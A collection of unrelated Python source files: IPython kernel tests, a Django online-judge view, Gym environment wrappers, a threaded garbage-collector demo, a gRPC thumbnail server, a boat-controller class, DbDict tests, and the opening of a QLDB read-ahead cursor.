content = f.read()
assert u'a=1' in content
assert u'b=u"abcþ"' in content
@dec.skip_without('faulthandler')
def test_smoke_faulthandler():
with kernel() as kc:
# Note: faulthandler.register is not available on windows.
code = u'\n'.join([
'import sys',
'import faulthandler',
'import signal',
'faulthandler.enable()',
'if not sys.platform.startswith("win32"):',
' faulthandler.register(signal.SIGTERM)'])
_, reply = execute(code, kc=kc)
nt.assert_equal(reply['status'], 'ok', reply.get('traceback', ''))
def test_help_output():
"""ipython kernel --help-all works"""
tt.help_all_output_test('kernel')
def test_is_complete():
with kernel() as kc:
# There are more test cases for this in core - here we just check
# that the kernel exposes the interface correctly.
kc.is_complete('2+2')
reply = kc.get_shell_msg(block=True, timeout=TIMEOUT)
assert reply['content']['status'] == 'complete'
# SyntaxError
kc.is_complete('raise = 2')
reply = kc.get_shell_msg(block=True, timeout=TIMEOUT)
assert reply['content']['status'] == 'invalid'
kc.is_complete('a = [1,\n2,')
reply = kc.get_shell_msg(block=True, timeout=TIMEOUT)
assert reply['content']['status'] == 'incomplete'
assert reply['content']['indent'] == ''
# Cell magic ends on two blank lines for console UIs
kc.is_complete('%%timeit\na\n\n')
reply = kc.get_shell_msg(block=True, timeout=TIMEOUT)
assert reply['content']['status'] == 'complete'
def test_complete():
with kernel() as kc:
execute(u'a = 1', kc=kc)
wait_for_idle(kc)
cell = 'import IPython\nb = a.'
kc.complete(cell)
reply = kc.get_shell_msg(block=True, timeout=TIMEOUT)
c = reply['content']
assert c['status'] == 'ok'
start = cell.find('a.')
end = start + 2
assert c['cursor_end'] == cell.find('a.') + 2
assert c['cursor_start'] <= end
# there are many right answers for cursor_start,
# so verify application of the completion
# rather than the value of cursor_start
matches = c['matches']
assert matches
for m in matches:
completed = cell[:c['cursor_start']] + m
assert completed.startswith(cell)
@dec.skip_without('matplotlib')
def test_matplotlib_inline_on_import():
with kernel() as kc:
cell = '\n'.join([
'import matplotlib, matplotlib.pyplot as plt',
'backend = matplotlib.get_backend()'
])
_, reply = execute(cell,
user_expressions={'backend': 'backend'},
kc=kc)
_check_status(reply)
backend_bundle = reply['user_expressions']['backend']
_check_status(backend_bundle)
assert 'backend_inline' in backend_bundle['data']['text/plain']
def test_message_order():
N = 100 # number of messages to test
with kernel() as kc:
_, reply = execute("a = 1", kc=kc)
_check_status(reply)
offset = reply['execution_count'] + 1
cell = "a += 1\na"
msg_ids = []
# submit N executions as fast as we can
for i in range(N):
msg_ids.append(kc.execute(cell))
# check message-handling order
for i, msg_id in enumerate(msg_ids, offset):
reply = kc.get_shell_msg(timeout=TIMEOUT)
_check_status(reply['content'])
assert reply['content']['execution_count'] == i
assert reply['parent_header']['msg_id'] == msg_id
def test_shutdown():
"""Kernel exits after polite shutdown_request"""
with new_kernel() as kc:
km = kc.parent
execute(u'a = 1', kc=kc)
wait_for_idle(kc)
kc.shutdown()
for i in range(300): # 30s timeout
if km.is_alive():
time.sleep(.1)
else:
break
assert not km.is_alive()
|
views.py | from .models import Problem, TestCase
from . import forms as problems_forms
from django.http import Http404
from django.shortcuts import render, redirect
from django.core.urlresolvers import reverse
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django.template.context_processors import csrf
from django.contrib.auth.models import User
from judge.models import *
from judge.models import last_queue
from judge.oldcheck import bashoutput
from django.core.files.base import ContentFile
import threading
from datetime import datetime
from django.utils import timezone
from django.utils.six.moves.urllib.parse import urlencode
# Create your views here.
now = datetime.now()
def index(request):
"""
Display list of all :model:`problems.Problem` objects.
This view enables the user to access all problems the problems from single page.
**Args:**
1. ``all_problems``
It is a query-set of :model:`problems.Problem` constisting of all problems in the database
**Template:**
:template:`problems/index.html`
"""
all_problems = Problem.objects.filter(contest__start_time__lte = timezone.now())
return render(request,"problems/index.html", {'all_problems' : all_problems})
def problem(request, problemID):
"""
It is the detailed view for a particular problem. This views enables you to access all problems in a particular contests. It has been divided into three parts and three different templates have been created for each of them
1. Problem belonging to Past contests
2. Problem belonging to Present contests
The details of these views are as follows
- If a user tries to access a problem which is stored in database but as a problem belong to future contest a 404 error page is displayed
- For a user solving problem belonging to a past contest, he can submit his solution and get verdict on his solution. To submit his solution either he can attempt the problem on the inbuilt editor provided on the website which supports syntax highightening of multiple languages and submit or he can directly submit solution from his system. He can also run solution against custom input and get to know wether his solution is working as expected or not (when he is using the inbuilt editor)
- For a current contest, if the user registered for the contest then he can access problems from the website. Apart from normal problem view, we have provided a countdown timer on website.
**Args:**
1. ``submit_form``
It's a django form instance of SubmitForm
2. ``code_form``
It's a django form instance of CodeForm
3. ``test_form``
It's a django form instance of TestForm
4. ``problem``
It's an instance of the :model:`problems.Problem` object
5. ``contest``
It's an instance of the :model:`problems.Problem` object 6. ``text_on_ace``
6. ``text_on_ace``
It's the default text that appears on the ace editor
7. ``lang_for_ace``
It's the default language that appears in the ace editor
8. ``output``
It's the verdict which user gets when he tests code against custom input
9. ``hide_or_not``
It tells wether to show to output cardboard or not
**Template:**
1. :template:`contests/notactive.html`
2. :template:`contests/contest.html`
"""
try:
problem = Problem.objects.get(problem_ID=problemID)
except Problem.DoesNotExist:
raise Http404("There is no such problem. Please check again")
if request.method == 'POST':
#print("Hello World!!\n")
submit_form = problems_forms.SubmitForm(request.POST, request.FILES)
code_form = problems_forms.CodeForm(request.POST)
test_form = problems_forms.TestForm(request.POST)
#print("\n")
if submit_form.is_valid():
#print("File submit")
global last_queue
last_queue = (last_queue + 1)%3
submission = Submission()
submission = submit_form.save(commit=False)
submission.user = User.objects.get(username=request.user)
submission.problem = problem
submission.queue = Queue.objects.all()[last_queue]
submission.save()
messages.success(request, 'Successfully Submitted')
if not grader_running[last_queue]:
t = threading.Thread(target=grader,kwargs={'queue_number':last_queue})
t.start()
return redirect(reverse('mysubmissions', kwargs={'username':request.user}))
elif code_form.is_valid():
#print(2)
#print("Ace code")
def process():
global last_queue
last_queue = (last_queue + 1)%3
data = code_form.cleaned_data
submission = Submission()
submission.language = data['lang']
submission.user = User.objects.get(username=request.user)
submission.problem = problem
submission.queue = Queue.objects.all()[last_queue]
submission.uploaded_file.save('arbit',ContentFile(data['code']))
submission.save()
process()
messages.success(request, 'Successfully Submitted')
if not grader_running[last_queue]:
t = threading.Thread(target=grader,kwargs={'queue_number':last_queue})
t.start()
return redirect(reverse('mysubmissions', kwargs={'username':request.user}))
elif test_form.is_valid():
#print("He doesnt terminal")
data = test_form.cleaned_data
test_lang = data['test_lang']
test_code = data['test_code']
test_input = data['test_input']
username_of_user = request.user.username
f = open("uploads/users/%s/test.%s"%(username_of_user,test_lang),"w+")
f.write(test_code)
f.close()
g = open("uploads/users/%s/inp"%(username_of_user),"w+")
g.write(test_input)
g.close()
output = bashoutput("uploads/users/%s/test.%s"%(username_of_user,test_lang),"uploads/users/%s/inp"%(username_of_user),test_lang)
args = {}
args.update(csrf(request))
args['submit_form'] = problems_forms.SubmitForm()
args['code_form'] = problems_forms.CodeForm()
args['test_form'] = problems_forms.TestForm()
args['problem'] = problem
contest = problem.contest
args['contest'] = contest
args['output'] = "Output :\n" + output
args['hide_or_not'] = "visible"
args['text_on_ace'] = test_code
args['lang_for_ace'] = test_lang
if contest.end_time.strftime('%Y-%m-%d %H:%M') <= now.strftime('%Y-%m-%d %H:%M'):
return render(request,"problems/problem.html", args)
elif contest.start_time.strftime('%Y-%m-%d %H:%M') <= now.strftime('%Y-%m-%d %H:%M'):
registered = contest.registered_user.filter(username = request.user.username)
args['registered'] = registered
return render(request,"problems/isactive.html", args)
else:
raise Http404("There is no such problem you prick, you can't hack the system the system hacks you -_- !!")
else:
messages.warning(request, 'There was an error. Please check!')
args = {}
args.update(csrf(request))
args['submit_form'] = problems_forms.SubmitForm()
args['code_form'] = problems_forms.CodeForm()
args['test_form'] = problems_forms.TestForm()
args['problem'] = problem
contest = problem.contest
args['contest'] = contest
args['text_on_ace'] = ""
args['output']=""
args['lang_for_ace']="cpp"
args['hide_or_not']= "hidden"
if contest.end_time.strftime('%Y-%m-%d %H:%M:%S') <= timezone.make_aware(datetime.now(),timezone.get_default_timezone()).astimezone(timezone.utc).strftime('%Y-%m-%d %H:%M:%S'):
return render(request,"problems/problem.html", args)
elif timezone.make_aware(datetime.now(),timezone.get_default_timezone()).astimezone(timezone.utc).strftime('%Y-%m-%d %H:%M:%S') >= contest.start_time.strftime('%Y-%m-%d %H:%M:%S'):
registered = contest.registered_user.filter(username = request.user.username)
args['registered'] = registered
return render(request,"problems/isactive.html", args)
else:
raise Http404("There is no such problem you prick, you can't hack the system the system hacks you -_- !!")
|
wrappers.py | # coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Wrappers for OpenAI Gym environments."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import atexit
import functools
import multiprocessing
import sys
import traceback
import gym
import gym.spaces
import numpy as np
import tensorflow.compat.v1 as tf
class AttributeModifier(object):
"""Provides getter and setter functions to access wrapped environments."""
def __getattr__(self, name):
return getattr(self._env, name)
def set_attribute(self, name, value):
"""Set an attribute in the wrapped environment.
Args:
name: Attribute to access.
value: New attribute value.
"""
set_attr = getattr(self._env, 'set_attribute', None)
if callable(set_attr):
self._env.set_attribute(name, value)
else:
setattr(self._env, name, value)
class RangeNormalize(AttributeModifier):
"""Normalize the specialized observation and action ranges to [-1, 1]."""
def __init__(self, env):
self._env = env
self._should_normalize_observ = self._is_finite(self._env.observation_space)
if not self._should_normalize_observ:
tf.logging.info('Not normalizing infinite observation range.')
self._should_normalize_action = self._is_finite(self._env.action_space)
if not self._should_normalize_action:
tf.logging.info('Not normalizing infinite action range.')
@property
def observation_space(self):
space = self._env.observation_space
if not self._should_normalize_observ:
return space
return gym.spaces.Box(
-np.ones(space.shape), np.ones(space.shape), dtype=np.float32)
@property
def action_space(self):
space = self._env.action_space
if not self._should_normalize_action:
return space
return gym.spaces.Box(
-np.ones(space.shape), np.ones(space.shape), dtype=np.float32)
def step(self, action):
if self._should_normalize_action:
action = self._denormalize_action(action)
observ, reward, done, info = self._env.step(action)
if self._should_normalize_observ:
observ = self._normalize_observ(observ)
return observ, reward, done, info
def reset(self):
observ = self._env.reset()
if self._should_normalize_observ:
observ = self._normalize_observ(observ)
return observ
def _denormalize_action(self, action):
min_ = self._env.action_space.low
max_ = self._env.action_space.high
action = (action + 1) / 2 * (max_ - min_) + min_
return action
def _normalize_observ(self, observ):
min_ = self._env.observation_space.low
max_ = self._env.observation_space.high
observ = 2 * (observ - min_) / (max_ - min_) - 1
return observ
def _is_finite(self, space):
return np.isfinite(space.low).all() and np.isfinite(space.high).all()
class ClipAction(AttributeModifier):
"""Clip out of range actions to the action space of the environment."""
def __init__(self, env):
self._env = env
@property
def action_space(self):
shape = self._env.action_space.shape
return gym.spaces.Box(
-np.inf * np.ones(shape), np.inf * np.ones(shape), dtype=np.float32)
def step(self, action):
action_space = self._env.action_space
action = np.clip(action, action_space.low, action_space.high)
return self._env.step(action)
class LimitDuration(AttributeModifier):
"""End episodes after specified number of steps."""
def __init__(self, env, duration):
self._env = env
self._duration = duration
self._step = None
def step(self, action):
if self._step is None:
raise RuntimeError('Must reset environment.')
observ, reward, done, info = self._env.step(action)
self._step += 1
if self._step >= self._duration:
done = True
self._step = None
return observ, reward, done, info
def reset(self):
self._step = 0
return self._env.reset()
class ExternalProcess(object):
"""Step environment in a separate process for lock free paralellism."""
# Message types for communication via the pipe.
_ACTION = 1
_RESET = 2
_CLOSE = 3
_GETATTRIBUTE = 4
_SETATTRIBUTE = 5
_TRANSITION = 6
_OBSERV = 7
_EXCEPTION = 8
_VALUE = 9
def __init__(self, constructor):
"""Step environment in a separate process for lock free paralellism.
The environment will be created in the external process by calling the
specified callable. This can be an environment class, or a function
creating the environment and potentially wrapping it. The returned
environment should not access global variables.
Args:
constructor: Callable that creates and returns an OpenAI gym environment.
Attributes:
observation_space: The cached observation space of the environment.
action_space: The cached action space of the environment.
"""
self._conn, conn = multiprocessing.Pipe()
self._process = multiprocessing.Process(
target=self._worker, args=(constructor, conn))
atexit.register(self.close)
self._process.start()
self._observ_space = None
self._action_space = None
@property
def observation_space(self):
if not self._observ_space:
self._observ_space = self.__getattr__('observation_space')
return self._observ_space
@property
def action_space(self):
if not self._action_space:
self._action_space = self.__getattr__('action_space')
return self._action_space
def __getattr__(self, name):
"""Request an attribute from the environment.
Note that this involves communication with the external process, so it can
be slow.
Args:
name: Attribute to access.
Returns:
Value of the attribute.
"""
self._conn.send((self._GETATTRIBUTE, name))
return self._receive(self._VALUE)
def set_attribute(self, name, value):
"""Set an attribute in the environment.
Note that this involves communication with the external process, so it can
be slow.
Args:
name: Attribute to access.
value: New attribute value.
"""
self._conn.send((self._SETATTRIBUTE, (name, value)))
def step(self, action, blocking=True):
"""Step the environment.
Args:
action: The action to apply to the environment.
blocking: Whether to wait for the result.
Returns:
Transition tuple when blocking, otherwise callable that returns the
transition tuple.
"""
self._conn.send((self._ACTION, action))
if blocking:
return self._receive(self._TRANSITION)
else:
return functools.partial(self._receive, self._TRANSITION)
def reset(self, blocking=True):
"""Reset the environment.
Args:
blocking: Whether to wait for the result.
Returns:
New observation when blocking, otherwise callable that returns the new
observation.
"""
self._conn.send((self._RESET, None))
if blocking:
return self._receive(self._OBSERV)
else:
return functools.partial(self._receive, self._OBSERV)
def close(self):
"""Send a close message to the external process and join it."""
if self._process:
try:
self._conn.send((self._CLOSE, None))
self._conn.close()
except IOError:
# The connection was already closed.
pass
self._process.join()
# Python leaks file descriptors without the line below
del self._process
del self._conn
self._conn = None
self._process = None
else:
pass # Don't close a connection twice
def _receive(self, expected_message):
"""Wait for a message from the worker process and return its payload.
Args:
expected_message: Type of the expected message.
Raises:
Exception: An exception was raised inside the worker process.
KeyError: The reveived message is not of the expected type.
Returns:
Payload object of the message.
"""
message, payload = self._conn.recv()
# Re-raise exceptions in the main process.
if message == self._EXCEPTION:
stacktrace = payload
raise Exception(stacktrace)
if message == expected_message:
return payload
raise KeyError('Received message of unexpected type {}'.format(message))
def _worker(self, constructor, conn):
"""The process waits for actions and sends back environment results.
Args:
constructor: Constructor for the OpenAI Gym environment.
conn: Connection for communication to the main process.
"""
try:
env = constructor()
while True:
try:
# Only block for short times to have keyboard exceptions be raised.
if not conn.poll(0.1):
continue
message, payload = conn.recv()
except (EOFError, KeyboardInterrupt):
break
if message == self._ACTION:
action = payload
conn.send((self._TRANSITION, env.step(action)))
continue
if message == self._RESET:
assert payload is None
conn.send((self._OBSERV, env.reset()))
continue
if message == self._GETATTRIBUTE:
name = payload
conn.send((self._VALUE, getattr(env, name)))
continue
if message == self._SETATTRIBUTE:
name, value = payload
set_attr = getattr(env, 'set_attribute', None)
if callable(set_attr):
env.set_attribute(name, value)
else:
setattr(env, name, value)
continue
if message == self._CLOSE:
assert payload is None
if hasattr(env, 'close'):
env.close()
break
raise KeyError('Received message of unknown type {}'.format(message))
except Exception: # pylint: disable=broad-except
stacktrace = ''.join(traceback.format_exception(*sys.exc_info())) # pylint: disable=no-value-for-parameter
conn.send((self._EXCEPTION, stacktrace))
tf.logging.error('Error in environment process: {}'.format(stacktrace))
conn.close()
|
garbage-collector.py | #!/usr/bin/env python3.6
#
# Multi-Threaded Garbage Collection Example by NOP-Gate/StackCanary
#
from random import randint
from datetime import datetime as dt
from time import sleep
from uuid import uuid4
from cmd import Cmd
from threading import Thread, Lock
COLLECTOR_PERIOD = 30 # Seconds
LOG_NAME = 'garbage-collector.log'
pool = {}
pool_lock = Lock()
sleep_lock = Lock()
stop_collecting = False
# Open the log file
log = open(LOG_NAME, 'w')
log.write('\nThreaded Garbage Collector Example Started')
print(F'Opened log file "{LOG_NAME}" - tail it for garbage collector thread output (tail -f {LOG_NAME})')
class GarbageConsole(Cmd):
intro = F'Multi-Threaded Garbage Collection Example\n\n{Cmd.do_help.__code__.co_consts[0]}'
prompt = '> '
collector = None
reactive_collection = False # Reactive collection is activated upon addition of new data
def default(self, line):
print(F'Error: "{line}" is not a valid command')
def emptyline(self):
pass
def do_collector(self, action):
"""collector start|stop|enable|disable
Start/stop periodic garbage collector thread or enable/disable reactive garbage collection.
Reactive collection is activated upon addition of new data.
"""
action = action.lower()
if action == 'start':
if self.collector is not None:
print('Collector is already running')
return
try:
log_message(F'Starting garbage collector with {COLLECTOR_PERIOD}s period...', True)
self.collector = Thread(target=garbage_collector)
self.collector.start()
except Exception as ex:
print(F'Error: {str(ex)}')
elif action == 'stop':
if self.collector is None:
print('Collector is not running')
return
log_message('Stopping garbage collector...', True)
global stop_collecting
stop_collecting = True
sleep_lock.release()
elif action == 'enable':
self.reactive_collection = True
log_message('Reactive garbage collection enabled', True)
elif action == 'disable':
self.reactive_collection = False
log_message('Reactive garbage collection disabled', True)
elif action == '':
print('Error: an action is required (one of: start/stop/enable/disable)')
else:
print(F'Error: "{action}" is not a valid collector action (valid actions: start/stop/enable/disable)')
def do_pool(self, _):
"""pool - print data pool contents"""
print('Data:')
pool_lock.acquire()
for id in pool:
print(F' {id} - {pool[id]} (age: {(dt.now() - pool[id]["created"]).total_seconds()}s)')
pool_lock.release()
def do_delete(self, id):
"""delete id - delete data from the pool"""
if id == '':
print('Error: you must specify the id of the data to be deleted')
return
elif id not in pool:
print(F'Error: no data with id "{id}" found in the pool')
return
pool_lock.acquire()
del pool[id]
pool_lock.release()
log_message(F'Deleted data "{id}"', True)
def do_garbage(self, lifetime):
"""garbage [lifetime] - Adds random garbage data with optional lifetime (defaults to random in [1, 240] seconds)"""
if lifetime == '':
lifetime = randint(1, 241)
pool_lock.acquire()
id = uuid4().hex
pool[id] = {
'data': None, # Data would go here, obviously
'created': dt.now(), # Consider using most recent access time instead
'lifetime': int(lifetime)
}
log_message(F'Added garbage data "{id}" with lifetime {lifetime}s', True)
pool_lock.release()
# Activate reactive garbage collection if enabled
if self.reactive_collection is True:
collector_thread = Thread(target=garbage_collector, args=(True,))
collector_thread.start()
def do_EOF(self, _):
"""Exit with CTRL+D"""
return self.do_exit()
def do_quit(self, _):
"""Exit"""
return self.do_exit()
def do_close(self, _):
"""Exit"""
return self.do_exit()
def do_exit(self, _=None):
"""Exit"""
# Signal collector thread to exit and release its sleep lock to wake it up
if self.collector is not None:
global stop_collecting
stop_collecting = True
sleep_lock.release()
# Close log file
log_message('Closing...')
log.close()
print()
return True
def log_message(message, also_print=False):
log.write(F'[{dt.now()}] {message}\n')
log.flush()
if also_print:
print(message)
def garbage_collector(reactive=False):
while True:
if reactive:
log_message('Running reactive garbage collection...')
else:
log_message('Running periodic garbage collection...')
# Loop over keys indirectly or Python will scold us with exceptions
ids = list(pool.keys())
for id in ids:
# Acquire lock before accessing object
pool_lock.acquire()
object = pool[id]
if (dt.now() - object['created']).total_seconds() > object['lifetime']:
del pool[id]
log_message(F'Removed expired object "{id}"')
pool_lock.release()
if reactive:
break
else:
# Use timeout with Lock.acquire(timeout) to control sleep duration
# but still allow main thread to wake this thread up on exit
sleep_lock.acquire(timeout=COLLECTOR_PERIOD)
if stop_collecting:
break
if not reactive:
try:
# Main thread closes file handle before collector thread gets here
# so we ignore its failure to print its dying message
log_message('Garbage collector stopped')
except ValueError:
pass
def main():
# Acquire the collector's sleep lock so we can wake it up on exit by releasing it
sleep_lock.acquire()
GarbageConsole().cmdloop()
if __name__ == '__main__':
main()
|
server.py | # Python std lib
import contextlib
import multiprocessing
import os
import pickle
import random
import signal
import socket
import sys
import tempfile
import threading
from concurrent import futures
from typing import Iterable
# 3rd party libs
import cv2
import grpc
import numpy as np
from simber import Logger
# Local grpc module
sys.path.append("/usr/app/grpc_config")
import video_thumbnail_pb2
import video_thumbnail_pb2_grpc
LOG_LEVEL: str = "INFO"
logger = Logger(__name__, log_path="/tmp/logs/server.log", level=LOG_LEVEL)
logger.update_format("{levelname} [{filename}:{lineno}]:")
NUM_WORKERS = int(os.environ.get("NUM_WORKERS", 1))
MAX_GRPC_PAYLOAD_SIZE = int(os.environ.get("MAX_GRPC_PAYLOAD_SIZE", 2000000000))
def get_video_thumbnail(video_path: str) -> np.ndarray:
"""
Args:
video_path (str): Video to get the thumbnail from
Returns:
(np.ndarray) : Video thumbnail
"""
cap = cv2.VideoCapture(video_path)
nb_frames = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
thumbnail_frame = random.randint(0, nb_frames - 1) # choosing thumbnail randomly
thumbnail: np.ndarray = None
frame_count = 0
while True:
ret, frame = cap.read()
if ret == True:
if frame_count == thumbnail_frame:
thumbnail = frame
break
else:
break
frame_count += 1
cap.release()
cv2.destroyAllWindows()
return thumbnail
def perform_binary_slicing(data: bytes, chunk_size: int) -> Iterable[bytes]:
"""
Slices a binary blob into chunks of chunk_size.
"""
data_size = sys.getsizeof(data)
if data_size < chunk_size:
yield data
current_chunk = 0
while current_chunk < data_size:
chunk = data[current_chunk : current_chunk + chunk_size]
current_chunk += chunk_size
yield chunk
def perform_binary_slicing_payloads(
data: bytes, chunk_size: int
) -> Iterable[video_thumbnail_pb2.VideoResult]:
"""
Slices a binary blob into chunks of chunk_size with gRPC message expected by the server.
"""
for chunk in perform_binary_slicing(data, chunk_size):
yield video_thumbnail_pb2.VideoResult(error=False, chunk=chunk)
class VideoService(video_thumbnail_pb2_grpc.VideoServicer):
def __init__(self, worker_id) -> None:
super().__init__()
self.worker_id = worker_id
def Process(
self, request_chunks: Iterable[video_thumbnail_pb2.VideoCandidate], context
) -> Iterable[video_thumbnail_pb2.VideoResult]:
logger.info(f"[Worker {self.worker_id}] Processing incoming request...")
# Processing incoming video chunks to form original video
video_bytearray: bytearray = bytearray()
try:
for request_chunk in request_chunks:
video_bytearray.extend(request_chunk.chunk)
with tempfile.NamedTemporaryFile("wb", suffix=".mp4") as input_video_file:
input_video_file.write(bytes(video_bytearray))
video_thumbnail = get_video_thumbnail(input_video_file.name)
logger.info(f"[Worker {self.worker_id}] Finished thumbnailing.")
thumbnail_binary = pickle.dumps(video_thumbnail)
for chunk in perform_binary_slicing_payloads(
thumbnail_binary, MAX_GRPC_PAYLOAD_SIZE
):
yield chunk
except Exception as e:
logger.error(e)
yield video_thumbnail_pb2.VideoResult(error=True, chunk=None)
def _run_server(bind_address, worker_id):
def on_done(signum, frame):
logger.info("Got signal {}, {}".format(signum, frame))
done.set()
logger.info(f"[Worker {worker_id}] Server started. Awaiting jobs...")
server = grpc.server(
futures.ThreadPoolExecutor(max_workers=1),
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
("grpc.so_reuseport", 1),
("grpc.use_local_subchannel_pool", 1),
],
)
video_thumbnail_pb2_grpc.add_VideoServicer_to_server(
VideoService(worker_id),
server,
)
server.add_insecure_port(bind_address)
server.start()
done = threading.Event()
signal.signal(signal.SIGTERM, on_done) # catch SIGTERM for clean container exit
done.wait()
server.wait_for_termination()
@contextlib.contextmanager
def _reserve_port():
"""Find and reserve a port for all subprocesses to use"""
sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
if sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT) == 0:
raise RuntimeError("[Main] Failed to set SO_REUSEPORT.")
sock.bind(("", 13000))
try:
yield sock.getsockname()[1]
finally:
sock.close()
def main():
"""
Starts gRPC server and its workers.
Inspired from https://github.com/grpc/grpc/blob/master/examples/python/multiprocessing/server.py
"""
logger.info(f"[Main] Initializing server with {NUM_WORKERS} workers")
with _reserve_port() as port:
bind_address = f"[::]:{port}"
logger.info(f"[Main] Binding to {bind_address}")
workers = []
for worker_id in range(NUM_WORKERS):
logger.info(f"[Main] Starting worker {worker_id}...")
worker = multiprocessing.Process(
target=_run_server, args=(bind_address, worker_id)
)
worker.start()
workers.append(worker)
for worker in workers:
worker.join()
if __name__ == "__main__":
main()
|
ControlledBoat.py | # !/usr/bin/python3
"""
ControlledBoat - remote control boat
This is an implementation of the CommsController to allow
a controller object to be linked to a boat object and optionally
have a listener display the status of the boat.
"""
import math
import sys
from CommsController import CommsController
NAVIGATION = 0
TARGETTING = 1
class ControlledBoat(CommsController):
def __init__(self, boat=None, controller=None, listener=None):
# initialise control boat and add any controller
'''
# debug info
print("ControlledBoat:")
print("boat=", boat)
print("controller=", controller)
print("listener=", listener)
print("super()=", super())
print("super().__init__=", super().__init__)
'''
super().__init__(boat=boat, server=controller)
'''
if controller:
self.addServer(controller)
'''
# add in any listener
self.boatListeners = []
if listener:
self.addBoatListener(listener)
return
def addBoatListener(self, listener):
self.boatListeners.append(listener)
# and then pass back relevant info ...
listener.added(self.boat)
return
def report(self):
if self.boat and len(self.boatListeners) > 0:
values = self.boat.report()
for listener in self.boatListeners:
# let each listener get the data
listener.update(*values)
return
'''
Using servers for BoatControllers
Might want to override stopping(serverID)
navigate(self, x, y)
target(self, gun, angle)
'''
#
# Overridden methods ...
#
def navigate(self, connectionId, x, y):
super().navigate(connectionId, x, y)
# then report oy back up to the boat listeners
self.report()
return
if __name__ == '__main__':
def waitABit():
print("Wait a bit")
for i in range(10):
sleep(1)
print("waited", i, "seconds")
sleep(1)
text = input("Wait Till Someone presses enter:\n")
print("... received:", text)
return
from GpioZeroBoat import GPIOZeroBoat
from gpiozero.pins.mock import MockFactory # makes mock available
from gpiozero.pins.mock import MockPWMPin # to allow PWM
from gpiozero import Device
Device.pin_factory = MockFactory(pin_class=MockPWMPin)
left = (4, 14)
right = (17, 18)
center = (21, 22)
servo = 24
boat = GPIOZeroBoat(left, right, center, servo)
from TestController import TestController
testController = TestController()
from TestListener import TestListener
testListener = TestListener()
print("About to create controled boat")
print("adding the test controller should start it")
test = ControlledBoat(boat, testController, testListener)
from time import sleep
from threading import Thread
thread = Thread(target=waitABit)
thread.start()
thread.join()
print("Shut down controller")
testController.stopMe()
sleep(1)
print("Wait for the controller to stop ...")
# testController.join()
print("it stopped, so stop the boat and finish")
test.boat.stop()
print("Stopped")
|
test_dbdict.py | #!/usr/bin/env python
import unittest
from threading import Thread
from functions_cache.engines.storage.dbdict import DbDict, DbPickleDict
from tests.test_custom_dict import BaseCustomDictTestCase
class DbdictTestCase(BaseCustomDictTestCase, unittest.TestCase):
def test_bulk_commit(self):
d = DbDict(self.NAMESPACE, self.TABLES[0])
with d.bulk_commit():
pass
d.clear()
n = 1000
with d.bulk_commit():
for i in range(n):
d[i] = i
self.assertEqual(list(d.keys()), list(range(n)))
def test_switch_commit(self):
d = DbDict(self.NAMESPACE)
d.clear()
d[1] = 1
d = DbDict(self.NAMESPACE)
self.assertIn(1, d)
d.can_commit = False
d[2] = 2
d = DbDict(self.NAMESPACE)
self.assertNotIn(2, d)
self.assertTrue(d.can_commit)
def test_fast_save(self):
d1 = DbDict(self.NAMESPACE, fast_save=True)
d2 = DbDict(self.NAMESPACE, self.TABLES[1], fast_save=True)
d1.clear()
n = 1000
for i in range(n):
d1[i] = i
d2[i * 2] = i
# HACK if we will not sort, fast save can produce different order of records
self.assertEqual(sorted(d1.keys()), list(range(n)))
self.assertEqual(sorted(d2.values()), list(range(n)))
def test_usage_with_threads(self):
def do_test_for(d, n_threads=5):
d.clear()
fails = []
def do_inserts(values):
try:
for v in values:
d[v] = v
except Exception:
fails.append(1)
raise
def values(x, n):
return [i * x for i in range(n)]
threads = [Thread(target=do_inserts, args=(values(i, n_threads),)) for i in range(n_threads)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertFalse(fails)
for i in range(n_threads):
for x in values(i, n_threads):
self.assertEqual(d[x], x)
do_test_for(DbDict(self.NAMESPACE, fast_save=True), 20)
do_test_for(DbPickleDict(self.NAMESPACE, fast_save=True), 10)
d1 = DbDict(self.NAMESPACE, fast_save=True)
d2 = DbDict(self.NAMESPACE, self.TABLES[1], fast_save=True)
do_test_for(d1)
do_test_for(d2)
do_test_for(DbDict(self.NAMESPACE))
if __name__ == '__main__':
unittest.main()
|
read_ahead_cursor.py | # Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with
# the License. A copy of the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions
# and limitations under the License.
from logging import getLogger
from queue import Full, Queue
from threading import Thread
from botocore.exceptions import ClientError
from .stream_cursor import StreamCursor
from ..errors import ResultClosedError
logger = getLogger(__name__)
class ReadAheadCursor(StreamCursor):
"""
An iterable class representing a read ahead cursor on a statement's result set. This class will create a queue of
size `read_ahead` and fetch results asynchronously to fill the queue.
:type statement_result: dict
:param statement_result: The initial result set data dictionary of the statement's execution.
:type session: :py:class:`pyqldb.communication.session_client.SessionClient`
:param session: The parent session that represents the communication channel to QLDB.
:type transaction_id: str
:param transaction_id: The ID of this cursor's parent transaction, required to fetch pages.
:type read_ahead: int
:param read_ahead: The number of pages to read-ahead and buffer in this cursor.
:type executor: :py:class:`concurrent.futures.thread.ThreadPoolExecutor`
:param executor: The optional executor for asynchronous retrieval. If none specified, a new thread is created.
"""
def __init__(self, statement_result, session, transaction_id, read_ahead, executor):
super().__init__(statement_result, session, transaction_id)
self._queue = Queue(read_ahead - 1)
if executor is None:
thread = Thread(target=self._populate_queue)
thread.setDaemon(True)
thread.start()
else:
executor.submit(self._populate_queue)
def _are_there_more_results(self):
"""
Check if there are more results.
"""
